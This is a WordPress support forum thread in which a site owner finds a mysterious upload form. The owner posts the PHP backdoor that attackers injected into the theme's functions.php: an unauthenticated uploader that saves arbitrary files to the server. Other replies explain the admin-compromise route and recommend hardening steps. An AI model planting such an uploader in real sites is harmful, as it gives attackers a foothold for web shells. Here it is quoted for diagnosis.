Title: Random upload form
Last modified: November 14, 2016

---

# Random upload form

 *  [tamarackshack](https://wordpress.org/support/users/tamarackshack/)
 * (@tamarackshack)
 * [9 years, 7 months ago](https://wordpress.org/support/topic/random-upload-form/)
 * Last week my website developed a problem and can anyone suggest how to fix it?
   The website is [http://www.tamarackshackantiques.com](http://www.tamarackshackantiques.com)
   and has a spot to upload a file for some reason at the top of the page. It randomly
   appeared and is on both the actual site and the admin part. I also can’t change
   or upload photos to the site or to the products. Any suggestions on how to fix
   this?

Viewing 5 replies - 1 through 5 (of 5 total)

 *  Moderator [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/)
 * (@sterndata)
 * Volunteer Forum Moderator
 * [9 years, 7 months ago](https://wordpress.org/support/topic/random-upload-form/#post-8434498)
 * According to Sucur, your site is not serving malware. Before we fly the “hacked”
   flag, lets do a few checks:
 * 1. Install Wordfence and perform a scan of the site, including themes, plugins,
   and core files.
 * 2. If that shows up as clean, this may be a plugin or theme issue. Please attempt
   to disable all plugins, and use one of the default (Twenty*) themes. If the problem
   goes away, enable them one by one to identify the source of your troubles.
 *  Thread Starter [tamarackshack](https://wordpress.org/support/users/tamarackshack/)
 * (@tamarackshack)
 * [9 years, 7 months ago](https://wordpress.org/support/topic/random-upload-form/#post-8436076)
 * Thank you for your help. I do believe that the site was hacked and I figured 
   out that they added this to my funtion.php on my child theme:
 * <?php
    if(isset($_POST[‘Submit’])){ $filedir = “”; $maxfile = ‘2000000’;
 *  $userfile_name = $_FILES[‘image’][‘name’];
    $userfile_tmp = $_FILES[‘image’][‘
   tmp_name’]; if (isset($_FILES[‘image’][‘name’])) { $abod = $filedir.$userfile_name;
   @move_uploaded_file($userfile_tmp, $abod);
 * echo”<center><b>Done ==> $userfile_name</b></center>”;
    } } else{ echo’ <form
   method=”POST” action=”” enctype=”multipart/form-data”><input type=”file” name
   =”image”><input type=”Submit” name=”Submit” value=”Submit”></form>’; } ?>
 *  [g0tr00t](https://wordpress.org/support/users/g0tr00t/)
 * (@g0tr00t)
 * [9 years, 7 months ago](https://wordpress.org/support/topic/random-upload-form/#post-8436181)
 * That’s definitely the result of malicious action and there’s a very high chance
   that it was done through a WordPress admin compromise. Once they have your admin
   login, they want to upload files to increase their access privileges. This is
   done by uploading PHP shell files and can be done through the two most common
   methods AFTER they have the admin login:
 * 1) Utilize the built-in theme editor to modify the source coding of your theme(
   this is what was likely used in your case)
 * 2) Utilize the plugin uploader to upload a fake plugin that actually contains
   their PHP shells or other malware to increase access privileges for themselves
 * It looks like your login was compromised, theme editor used to inject malicious
   coding to the functions.php theme file and to be more specific it was coding 
   for a file uploader so they could use it to gain further access. It looks like
   an amateur job.
 * If you don’t have a recent clean backup that you can restore from, then I would
   recommend contacting a specialist to handle this for you unless you are familiar
   with hosting environments. After cleaning, you will want to start by hardening
   your WP environment. By far the best two things would be the following:
 * – Disable theme editor through wp-config.php
 * – Implement two-factor authentication for wp-admin
 * P.S. If you are hosting multiple domains under a single user then they are also
   probably infected, or will be soon, through cross site contamination.
    -  This reply was modified 9 years, 7 months ago by [g0tr00t](https://wordpress.org/support/users/g0tr00t/).
      Reason: Forgot to mention cross-site contamination
 *  Moderator [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/)
 * (@sterndata)
 * Volunteer Forum Moderator
 * [9 years, 7 months ago](https://wordpress.org/support/topic/random-upload-form/#post-8436240)
 * Remain calm and carefully follow [this guide](https://codex.wordpress.org/FAQ_My_site_was_hacked).
   When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://codex.wordpress.org/Hardening_WordPress).
 *  [Michael Kwan](https://wordpress.org/support/users/michoscopic/)
 * (@michoscopic)
 * [9 years ago](https://wordpress.org/support/topic/random-upload-form/#post-9179379)
 * Thank you very much, I encountered the exact same thing and you’ve saved me a
   crapload of time looking for solutions. Thank you.

Viewing 5 replies - 1 through 5 (of 5 total)

The topic ‘Random upload form’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 5 replies
 * 4 participants
 * Last reply from: [Michael Kwan](https://wordpress.org/support/users/michoscopic/)
 * Last activity: [9 years ago](https://wordpress.org/support/topic/random-upload-form/#post-9179379)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics